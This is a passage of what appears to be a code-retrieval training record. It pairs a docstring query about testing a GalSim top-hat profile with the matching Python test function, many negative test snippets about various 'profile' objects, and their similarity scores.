test_skos_profile(self):\n soil_oi = get_adapter(str(INPUT_DIR / \"soil-profile.skos.nt\"))\n soil_oi.prefix_map()[\"soilprofile\"] = \"http://anzsoil.org/def/au/asls/soil-profile/\"\n soil_oi.ontology_metamodel_mapper = OntologyMetadataMapper(\n [], curie_converter=soil_oi.converter\n )\n soil_oi.ontology_metamodel_mapper.use_skos_profile()\n self.assertEqual(\n [\"skos:prefLabel\"], soil_oi.ontology_metamodel_mapper.map_curie(\"rdfs:label\")\n )\n self.assertEqual(\"skos:prefLabel\", soil_oi.ontology_metamodel_mapper.label_curie())\n soil_oi.multilingual = True\n self.assertTrue(soil_oi.multilingual)\n soil_oi.preferred_language = \"en\"\n label_cases = [\n (\"soilprofile:voids\", \"Voids\"),\n (\"soilprofile:soil-water-regime\", \"Soil water regime\"),\n ]\n elabels = list(soil_oi.labels(soil_oi.entities()))\n for curie, label in label_cases:\n self.assertIn((curie, label), elabels)\n self.assertEqual(label, soil_oi.label(curie))\n config = SearchConfiguration(is_partial=False, properties=[SearchProperty.LABEL])\n curies = list(soil_oi.basic_search(label, config=config))\n self.assertEqual([curie], curies)\n # TODO:\n # self.assertEqual([curie], soil_oi.curies_by_label(label))\n tdef = soil_oi.definition(\"soilprofile:voids-cracks\")\n self.assertEqual(\"Planar voids\", tdef)", "def checkProfileEquality(self, profile1, profile2):\r\n if len(profile1) != len(profile2) or len(profile1[0]) != len(profile2[0]):\r\n return False\r\n for gram1 in profile1:\r\n contains = False\r\n for gram2 in profile2:\r\n if gram1 == gram2:\r\n contains = True\r\n break\r\n if contains == False:\r\n return False\r\n return True", "def test_attributes(self):\n result = self.plugin_instance.create_probability_cube(\n self.percentiles_cube, self.orography_cube)\n self.assertEqual(result.units, \"1\")\n self.assertEqual(result.name(), self.new_name)\n self.assertEqual(result.attributes['relative_to_threshold'], 'below')\n self.assertEqual(result.attributes['thresholded_using'],\n 'surface_altitude')", "def test_single_game_works(self):\n sim = ss.Simulation(seed=154)\n game1 = sim.single_game()\n sim = ss.Simulation(seed=79)\n game2 = sim.single_game()\n assert game1 != game2, 'Your method single_game is not working.'", "def test_calculates_risk_points_with_mortgaged_house(self):\n\n self.user[\"houses\"].insert(0, {\n \"id\": 123,\n \"ownership_status\": \"mortgaged\"\n })\n\n self.risk_profile[\"home\"].insert(0, {\n \"id\": 123,\n \"is_eligible\": True,\n \"risk_points\": 1\n })\n\n self.calculates_risk_points_by_houses.execute(self.user, self.risk_profile)\n\n for house in self.risk_profile[\"home\"]:\n if house[\"id\"] == 123:\n self.assertEquals(house[\"risk_points\"], 2)\n else: \n self.assertEquals(house[\"risk_points\"], 1)\n \n self.assertEquals(self.risk_profile[\"disability\"][\"risk_points\"], 2)", "def test_generate_nb_testing(self):\n pass", "def check_expectations(self):\n self.load_results()\n\n for (benchmark, producer), result in self.results.items():\n if not result.reports:\n print('No results found for ' + benchmark + ' ' + producer)\n result.test_passed = False\n else:\n for report in result.reports:\n if check_benchmark_result(report, result.expectation):\n print('Test passed: ' + result.directory)\n result.test_passed = True\n else:\n print('Test failed: ' + result.directory)\n result.test_passed = False", "def test_init(self):\n self.assertTrue(self.profile.bio == \"very awesome\")" ]
[ "0.61851823", "0.58061886", "0.5779419", "0.5712594", "0.5674602", "0.5597677", "0.55736697", "0.5516804", "0.5508091", "0.5494304", "0.5471239", "0.5412909", "0.5381883", "0.5344296", "0.53197837", "0.531884", "0.53139627", "0.52807105", "0.52799165", "0.52634877", "0.5258606", "0.5234149", "0.52174133", "0.52152884", "0.52103573", "0.52060014", "0.51935214", "0.5188514", "0.51790065", "0.51676714", "0.5156733", "0.5150712", "0.5147572", "0.5140228", "0.5137297", "0.5120445", "0.5117273", "0.5112981", "0.51127565", "0.5109244", "0.51080745", "0.51057464", "0.5104817", "0.50931996", "0.50881714", "0.5083384", "0.5070954", "0.5063577", "0.5063309", "0.5056949", "0.50488764", "0.50487316", "0.50480974", "0.504616", "0.5032011", "0.50311923", "0.50292814", "0.50152403", "0.5010083", "0.5006998", "0.49961904", "0.49935016", "0.4984886", "0.49832252", "0.49742636", "0.49738497", "0.49712577", "0.49691445", "0.4967528", "0.49639365", "0.4960421", "0.4953813", "0.495062", "0.49405253", "0.4935477", "0.49252433", "0.49156383", "0.4913454", "0.49085107", "0.4900855", "0.4894699", "0.48933208", "0.48847756", "0.48840505", "0.48839217", "0.48832905", "0.48827854", "0.48825526", "0.48745677", "0.4868866", "0.48676986", "0.48648822", "0.4861814", "0.48616314", "0.48601624", "0.48518106", "0.4848623", "0.48417547", "0.4838974", "0.4838853" ]
0.5113333
37
Test the generation of a specific tophat profile against a known result.
def test_tophat(): savedImg = galsim.fits.read(os.path.join(imgdir, "tophat_101.fits")) myImg = galsim.ImageF(savedImg.bounds, scale=0.2) myImg.setCenter(0,0) test_flux = 1.8 # There are numerical issues with using radius = 1, since many points are right on the edge # of the circle. e.g. (+-1,0), (0,+-1), (+-0.6,+-0.8), (+-0.8,+-0.6). And in practice, some # of these end up getting drawn and not others, which means it's not a good choice for a unit # test since it wouldn't be any less correct for a different subset of these points to be # drawn. Using r = 1.01 solves this problem and makes the result symmetric. tophat = galsim.TopHat(radius=1.01, flux=1) tophat.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject TopHat disagrees with expected result") np.testing.assert_array_equal( tophat.radius, 1.01, err_msg="TopHat radius returned wrong value") # Check with default_params tophat = galsim.TopHat(radius=1.01, flux=1, gsparams=default_params) tophat.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject TopHat with default_params disagrees with expected result") tophat = galsim.TopHat(radius=1.01, flux=1, gsparams=galsim.GSParams()) tophat.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject TopHat with GSParams() disagrees with expected result") # Use non-unity values. tophat = galsim.TopHat(flux=1.7, radius=2.3) gsp = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) tophat2 = galsim.TopHat(flux=1.7, radius=2.3, gsparams=gsp) assert tophat2 != tophat assert tophat2 == tophat.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) # Test photon shooting. do_shoot(tophat,myImg,"TopHat") # Test shoot and kvalue scale = 0.2939 im = galsim.ImageF(16,16, scale=scale) # The choices of radius here are fairly specific. If the edge of the circle comes too close # to the center of one of the pixels, then the test will fail, since the Fourier draw method # will blur the edge a bit and give some flux to that pixel. for radius in [ 1.2, 0.93, 2.11 ]: tophat = galsim.TopHat(radius=radius, flux=test_flux) check_basic(tophat, "TopHat with radius = %f"%radius) do_shoot(tophat,im,"TopHat with radius = %f"%radius) do_kvalue(tophat,im,"TopHat with radius = %f"%radius) # This is also a profile that may be convolved using real space convolution, so test that. conv = galsim.Convolve(tophat, galsim.Pixel(scale=scale), real_space=True) check_basic(conv, "TopHat convolved with pixel in real space", approx_maxsb=True, scale=0.2) do_kvalue(conv,im, "TopHat convolved with pixel in real space") cen = galsim.PositionD(0, 0) np.testing.assert_equal(tophat.centroid, cen) np.testing.assert_almost_equal(tophat.kValue(cen), (1+0j) * test_flux) np.testing.assert_almost_equal(tophat.flux, test_flux) np.testing.assert_almost_equal(tophat.xValue(cen), tophat.max_sb) np.testing.assert_almost_equal(tophat.xValue(radius-0.001, 0.), tophat.max_sb) np.testing.assert_almost_equal(tophat.xValue(0., radius-0.001), tophat.max_sb) np.testing.assert_almost_equal(tophat.xValue(radius+0.001, 0.), 0.) np.testing.assert_almost_equal(tophat.xValue(0., radius+0.001), 0.) # Check picklability do_pickle(tophat, lambda x: x.drawImage(method='no_pixel')) do_pickle(tophat) do_pickle(galsim.TopHat(1)) # Check sheared tophat the same way tophat = galsim.TopHat(radius=1.2, flux=test_flux) # Again, the test is very sensitive to the choice of shear here. Most values fail because # some pixel center gets too close to the resulting ellipse for the fourier draw to match # the real-space draw at the required accuracy. tophat = tophat.shear(galsim.Shear(g1=0.15, g2=-0.33)) check_basic(tophat, "Sheared TopHat") do_shoot(tophat,im, "Sheared TopHat") do_kvalue(tophat,im, "Sheared TopHat") cen = galsim.PositionD(0, 0) np.testing.assert_equal(tophat.centroid, cen) np.testing.assert_almost_equal(tophat.kValue(cen), (1+0j) * test_flux) np.testing.assert_almost_equal(tophat.flux, test_flux) np.testing.assert_almost_equal(tophat.xValue(cen), tophat.max_sb) # Check picklability do_pickle(tophat, lambda x: x.drawImage(method='no_pixel')) do_pickle(tophat) # Check real-space convolution of the sheared tophat. conv = galsim.Convolve(tophat, galsim.Pixel(scale=scale), real_space=True) check_basic(conv, "Sheared TopHat convolved with pixel in real space", approx_maxsb=True, scale=0.2) do_kvalue(conv,im, "Sheared TopHat convolved with pixel in real space")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_run_profile(dpa_model_spec, dpa_init):\n test_times = np.array(\n DateTime(['2019:001:00:00:00', '2019:001:12:00:00', '2019:002:00:00:00', '2019:003:00:00:00']).secs)\n pitch = np.array([150, 90, 156, 156])\n roll = np.array([0, -5, 10, 0])\n test_schedule = {'pitch': pitch, 'roll': roll}\n results = run_profile(test_times, test_schedule, '1dpamzt', dpa_model_spec, dpa_init)\n dpa_results = results['1dpamzt']\n assert np.all(dpa_results.mvals > -10)\n assert len(dpa_results.times) > 1", "async def test_basic_profile(players, strats):\n game = gamegen.game(players, strats)\n basesched = gamesched.gamesched(game)\n sched = canonsched.canon(basesched)\n assert np.all(sched.num_role_strats > 1)\n pay = await sched.sample_payoffs(sched.random_profile())\n assert pay.size == sched.num_strats\n assert str(sched) == str(basesched)", "def testProfileCreation(self):\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\n \n self.assertEqual(small_tree1_equality, True)\n self.assertEqual(small_tree2_equality, True)\n self.assertEqual(known_tree1_equality, True)\n self.assertEqual(known_tree2_equality, True)", "def __test_profile(self, bk):\n for arg in self.args['profile']:\n ds = ArgoDataFetcher(backend=bk).profile(*arg).to_xarray()\n assert isinstance(ds, xr.Dataset) == True", "def testProfileCreation(self):\r\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\r\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\r\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\r\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\r\n\r\n self.assertEqual(small_tree1_equality, True)\r\n self.assertEqual(small_tree2_equality, True)\r\n self.assertEqual(known_tree1_equality, True)\r\n self.assertEqual(known_tree2_equality, True)", "def test_execution_profiling(self):\n self._test_reports_helper({\"--profile-execution\": \"\"}, [\"report.txt\"])", "def test_creation_profile_2():\n assert tuple_NT[0][1] == LIST_dict[0]['sex'], \"sex of profile is not getting stored properly\"", "def _test_evaluate(self, format_only, outfile_predix=None):\n metric = MOTChallengeMetric(\n metric=['HOTA', 'CLEAR', 'Identity'],\n format_only=format_only,\n outfile_prefix=outfile_predix)\n metric.dataset_meta = {'classes': ('pedestrian', )}\n data_batch = dict(input=None, data_samples=None)\n predictions = self._get_predictions_demo()\n metric.process(data_batch, predictions)\n eval_results = metric.evaluate()\n return eval_results", "def test_profiles(\n self, profile_name: str, pytestconfig: object, monkeypatch: object, options: object\n ) -> None: # pylint: disable=unused-argument\n\n # initialize profile\n valid, message = self.init_profile(\n profile_name, pytestconfig=pytestconfig, monkeypatch=monkeypatch, options=options\n )\n assert valid, message\n\n # run custom test method before run method\n self.custom.test_pre_run(\n self, self.profile.data, monkeypatch if self.run_method == 'inline' else None\n )\n\n assert self.run_profile() in self.profile.exit_codes\n\n # run custom test method before validation\n self.custom.test_pre_validate(self, self.profile.data)\n\n # get Validation instance\n validation = ValidateFeature(self.validator)\n\n # validate App outputs and Profile outputs are consistent\n validation.validate_outputs(self.profile.tc_playbook_out_variables, self.profile.outputs)\n\n # validate App outputs with Profile outputs\n validation.validate(self.profile.outputs)\n\n # validate exit message\n exit_message_data = self.profile.exit_message\n if exit_message_data:\n self.validate_exit_message(\n exit_message_data.pop('expected_output'),\n exit_message_data.pop('op'),\n **exit_message_data\n )", "def test_creation_profile_5():\n assert tuple_NT[0][4] == LIST_dict[0]['current_location'], \"current_location' of profile is not getting stored properly\"", "def generateFinalResult(self):\n if self.__testResult == 'FAIL':\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'PASS':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'NONE':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY) \n self.__testResult = 'PASS'\n #else:\n total_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"total_count\", TestScriptSymbolTable.test_result_tab))\n pass_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"pass_count\", TestScriptSymbolTable.test_result_tab))\n fail_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"fail_count\", TestScriptSymbolTable.test_result_tab))\n conditional_chk_flag = int(TestScriptSymbolTable.get_value_from_sym_tab(\"conditional_chk_flag\", TestScriptSymbolTable.test_result_tab))\n num_of_pass_required = int(TestScriptSymbolTable.get_value_from_sym_tab(\"num_of_pass_required\", TestScriptSymbolTable.test_result_tab))\n \n if total_count >= 1:\n if conditional_chk_flag == 1:\n if num_of_pass_required <= pass_count:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n if fail_count > 0:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n if GlobalConfigFiles.curr_tc_name != \"\":\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n logging.debug(\"\\n TEST COMPLETED without FINAL RESULT...\")\n\n self.__testResult = 'FAIL'\n\n self.tmsPacket.TestResult = self.__testResult\n if GlobalConfigFiles.curr_tc_name != \"\":\n logging.info(\"\\n FINAL TEST RESULT ---> %15s\", self.__testResult)\n logging.info(' END: TEST CASE [%s]', GlobalConfigFiles.curr_tc_name)\n\n Util.set_color(Util.FOREGROUND_WHITE)\n GlobalConfigFiles.test_result = self.__testResult\n\n self.tmsPacket.TimeStamp = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.localtime())\n if GlobalConfigFiles.curr_tc_name != \"\":\n self.tmsPacket.writeTMSJson()\n\n return", "def test_output_ensure_output_for_property(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags == ArgoQcFlag.GOOD.value)", "def test_get(self):\r\n profile = self.profile_manager.get('testing')\r\n self.assertIsInstance(profile, Profile)", "def TDProfiles(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)\n \n# plt.figure()\n# plt.plot(np.exp(xS[:,0]))\n# plt.title('Temperature [K]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,1]))\n# plt.title('WV number density [$m^{-3}$]')\n# \n# plt.figure()\n# plt.semilogy(np.exp(xS[:,2])+1)\n# plt.title('Backscatter Ratio')\n \n \n# HSRLModel = HSRLProfileRatio(xS[:,0],P,xS[:,2], \\\n# Trx['HSRL Mol'],Trx['HSRL Comb'], \\\n# rb_spec['HSRL'],inu0['HSRL'],GainRatio=xK[0])\n\n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)\n\n# WVModel = WaterVaporProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['WV'],\n# Trx['WV Online'], Trx['WV Offline'], \\\n# rb_spec['WV Online'],rb_spec['WV Offline'], \\\n# abs_spec['WV Online'],abs_spec['WV Offline'],dr, \\\n# inu0['WV Online'],inu0['WV Offline'],GainRatio=xK[1])\n\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)\n \n# O2Model = OxygenProfileRatio(xS[:,0],P,xS[:,1],xS[:,2]*bsrMult['O2'],\n# Trx['O2 Online'], Trx['O2 Offline'], \\\n# rb_spec['O2 Online'],rb_spec['O2 Offline'], \\\n# abs_spec['O2 Online'],abs_spec['O2 Offline'],dr, \\\n# inu0['O2 Online'],inu0['O2 Offline'],GainRatio=xK[2])\n \n return HSRL_mol, HSRL_comb, WV_on, WV_off, O2_on, O2_off", "def test_ML_check_profile_epem_ttx(self):\n\n self.setup_logFile_for_logger('madgraph.check_cmd')\n try:\n cmd = os.getcwd()\n self.do('import model loop_sm')\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n \n # Make sure it works for an initial run\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=3)\n\n # Now for a Reuse-run\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n self.setup_logFile_for_logger('madgraph.check_cmd')\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=11)\n except:\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n raise\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)", "def check_profile(args):\n with_dataset(args, Dataset._check_profile)", "def test_user_profiles(self):\n\n result = self.client.get(\"/profile/1\")\n self.assertIn(b'In house:',result.data)", "def test_validate_payment_profile(self):\n self.cim.validate_payment_profile(\n customer_profile_id=u\"222\",\n customer_payment_profile_id=u\"444\",\n customer_address_id=u\"555\",\n )", "def verify_output(output_probs):\n with open (LOCAL_ROOT+LOCAL_IMAGE_LIST_PATH,'r') as f:\n gts = json.load(f)\n\n scores = []\n labels = []\n for k in output_probs:\n #import pdb;pdb.set_trace()\n if k in gts:\n scores.append(output_probs[k])\n # 43 is the index of Live/Spoof label\n labels.append(gts[k][43])\n\n fpr_list = [0.01, 0.005, 0.001]\n threshold_list = get_thresholdtable_from_fpr(scores,labels, fpr_list)\n tpr_list = get_tpr_from_threshold(scores,labels, threshold_list)\n \n # Show the result into score_path/score.txt \n logging.info('TPR@FPR=10E-3: {}\\n'.format(tpr_list[0]))\n logging.info('TPR@FPR=5E-3: {}\\n'.format(tpr_list[1]))\n logging.info('TPR@FPR=10E-4: {}\\n'.format(tpr_list[2]))\n\n logging.info(\"Done\")", "def test_profile_info(self):\n\n print '\\nIn test_profile_info...'\n file_names = glob.glob(self.input_dir+'dataset_*.txt')\n for err in [True,False]:\n for file_name in file_names:\n print '\\t%s, err=%s ='%(file_name,str(err)),\n description = file_name.split('_')[-1].split('.')[0]\n executable = lambda: \\\n profile_info.main(io.load_dataset(file_name),err=err)\n\n # If good, then profile_info.main should produce a valid df\n if '_good' in file_name:\n try:\n df = executable()\n qc.validate_profile_info(df)\n out_file = self.output_dir+\\\n 'profile_info_%s_err_%s.txt'%(description,str(err))\n io.write(df,out_file)\n io.load_profile_info(out_file)\n print 'good.'\n except:\n print 'bad (ERROR).'\n raise\n\n # If bad, then profile_info.main should raise SortSeqError\n elif '_bad' in file_name:\n try:\n self.assertRaises(SortSeqError,executable)\n print 'badtype.'\n except:\n print 'good (ERROR).'\n raise\n\n # There are no other options\n else:\n raise SortSeqError('Unrecognized class of file_name.')", "def generate_testcase(self, outfile, reg):\n \"\"\" testcase for the given register \"\"\"\n pass", "def test_output_set_output_flag_for_property(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", ArgoQcFlag.GOOD)\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags == ArgoQcFlag.GOOD.value)", "def test_output_set_output_flag_for_property_where(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", ArgoQcFlag.PROBABLY_GOOD, where=slice(None, 2))\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags[:2] == ArgoQcFlag.PROBABLY_GOOD.value)\n assert np.all(flags[2:] == ArgoQcFlag.GOOD.value)", "def test_output_set_output_flag_for_property_with_precendence(profile_from_dataset, lower, higher):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", lower, where=slice(None, 2))\n output.set_output_flag_for_property(\"PRES\", higher, where=slice(None, 1))\n output.set_output_flag_for_property(\"PRES\", lower, where=slice(None, 2))\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags[:1] == higher.value)\n assert np.all(flags[1:2] == lower.value)\n assert np.all(flags[2:] == ArgoQcFlag.GOOD.value)", "def test_voigtfit():\n import os.path\n\n fn = os.path.join(os.path.dirname(__file__), \"example_civ_tau.npz\")\n taus = np.load(fn)[\"arr_0\"]\n for tau in taus:\n assert np.shape(tau) == (473,)\n prof = voigtfit.Profiles(tau,5.0103430332365999,elem=\"C\",ion=4,line=1548)\n prof.do_fit()\n (ll, tfit) = prof.get_fitted_profile()\n #Check the fit is reasonable\n assert np.sum((tfit - tau)**2/(tau+0.5)**2)/np.size(tfit) < 0.05", "def test_get_profile(self):\n self.cim.get_profile(customer_profile_id=u\"123\")", "def attest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n if type(a) != N.ndarray:\r\n a = N.array(a)\r\n x = amean(a)\r\n v = avar(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v) / float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = abetai(0.5*df,0.5,df/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n statname,t,prob)\r\n return t,prob", "def evaluate_team(self, team, mode):\n if mode == Config.RESTRICTIONS['mode']['training']:\n point_population = self.point_population_\n opponent_population = self.training_opponent_population()\n elif mode == Config.RESTRICTIONS['mode']['validation']:\n point_population = self.validation_point_population_\n opponent_population = self.validation_opponent_population_\n elif mode == Config.RESTRICTIONS['mode']['champion']:\n point_population = self.champion_population()\n opponent_population = self.champion_opponent_population()\n else:\n raise ValueError(\"Invalid mode\")\n results = []\n extra_metrics_opponents = defaultdict(list)\n match_id = 0\n\n if len(point_population) == 0:\n raise ValueError(\"Error: Nothing in point population. Probably the population size is too small.\")\n if len(opponent_population) == 0:\n raise ValueError(\"Error: Nothing in opponent population. Probably the population size is too small.\")\n\n if mode == Config.RESTRICTIONS['mode']['training']:\n for point, opponent in zip(point_population, opponent_population):\n match_id += 1\n result = self._play_match(team, opponent, point, mode, match_id)\n team.reset_registers()\n extra_metrics_opponents[opponent.opponent_id].append(result)\n team.results_per_points_[point.point_id_] = result\n results.append(result)\n if opponent.opponent_id == 'hall_of_fame': # since the hall of fame changes over time, it is better to dont use it to get the champion score, since you wouldnt be able to track the score improvement\n extra_metrics_opponents[opponent.__repr__()].append(result)\n \n opponent_type = 'training_opponents'\n team.fitness_ = numpy.mean(results)\n else:\n extra_metrics_points = self._initialize_extra_metrics_for_points()\n for point, opponent in zip(point_population, opponent_population):\n match_id += 1\n result = self._play_match(team, opponent, point, mode, match_id)\n team.reset_registers()\n extra_metrics_opponents[opponent.opponent_id].append(result)\n extra_metrics_points = self._update_extra_metrics_for_points(extra_metrics_points, point, result)\n if mode == Config.RESTRICTIONS['mode']['validation']:\n team.results_per_points_for_validation_[point.point_id_] = result\n results.append(result)\n elif mode == Config.RESTRICTIONS['mode']['champion']:\n if opponent.opponent_id != 'hall_of_fame': # since the hall of fame changes over time, it is better to dont use it to get the champion score, since you wouldnt be able to track the score improvement\n results.append(result)\n else:\n extra_metrics_opponents[opponent.__repr__()].append(result)\n \n opponent_type = 'opponents'\n for key in extra_metrics_points:\n for subkey in extra_metrics_points[key]:\n extra_metrics_points[key][subkey] = round_value(numpy.mean(extra_metrics_points[key][subkey]))\n team.extra_metrics_['points'] = extra_metrics_points\n if mode == Config.RESTRICTIONS['mode']['validation']:\n team.score_validation_ = round_value(numpy.mean(results))\n else:\n team.score_champion_ = round_value(numpy.mean(results))\n\n for key in extra_metrics_opponents:\n extra_metrics_opponents[key] = round_value(numpy.mean(extra_metrics_opponents[key]))\n team.extra_metrics_[opponent_type] = extra_metrics_opponents", "def test_strategy_evaluate(self, MetricClass, seed):\n m = MetricClass()\n strategy = RandomTrader(seed=seed).run(make_randomwalk(seed=seed))\n result0 = np.array(m.result(strategy)) # from metric method\n result1 = np.array(strategy.evaluate(m)) # from strategy method\n assert np.equal(result0, result1).all()", "def test_get_risk_profile_using_get(self):\n pass", "def test_get_payment_profile(self):\n self.cim.get_payment_profile(\n customer_profile_id=u\"655\",\n customer_payment_profile_id=u\"999\"\n )", "def test_positive_electrode_potential_profile(self):\n\n # TODO: add these when have averages", "def test_skos_profile(self):\n soil_oi = get_adapter(str(INPUT_DIR / \"soil-profile.skos.nt\"))\n soil_oi.prefix_map()[\"soilprofile\"] = \"http://anzsoil.org/def/au/asls/soil-profile/\"\n soil_oi.ontology_metamodel_mapper = OntologyMetadataMapper(\n [], curie_converter=soil_oi.converter\n )\n soil_oi.ontology_metamodel_mapper.use_skos_profile()\n self.assertEqual(\n [\"skos:prefLabel\"], soil_oi.ontology_metamodel_mapper.map_curie(\"rdfs:label\")\n )\n self.assertEqual(\"skos:prefLabel\", 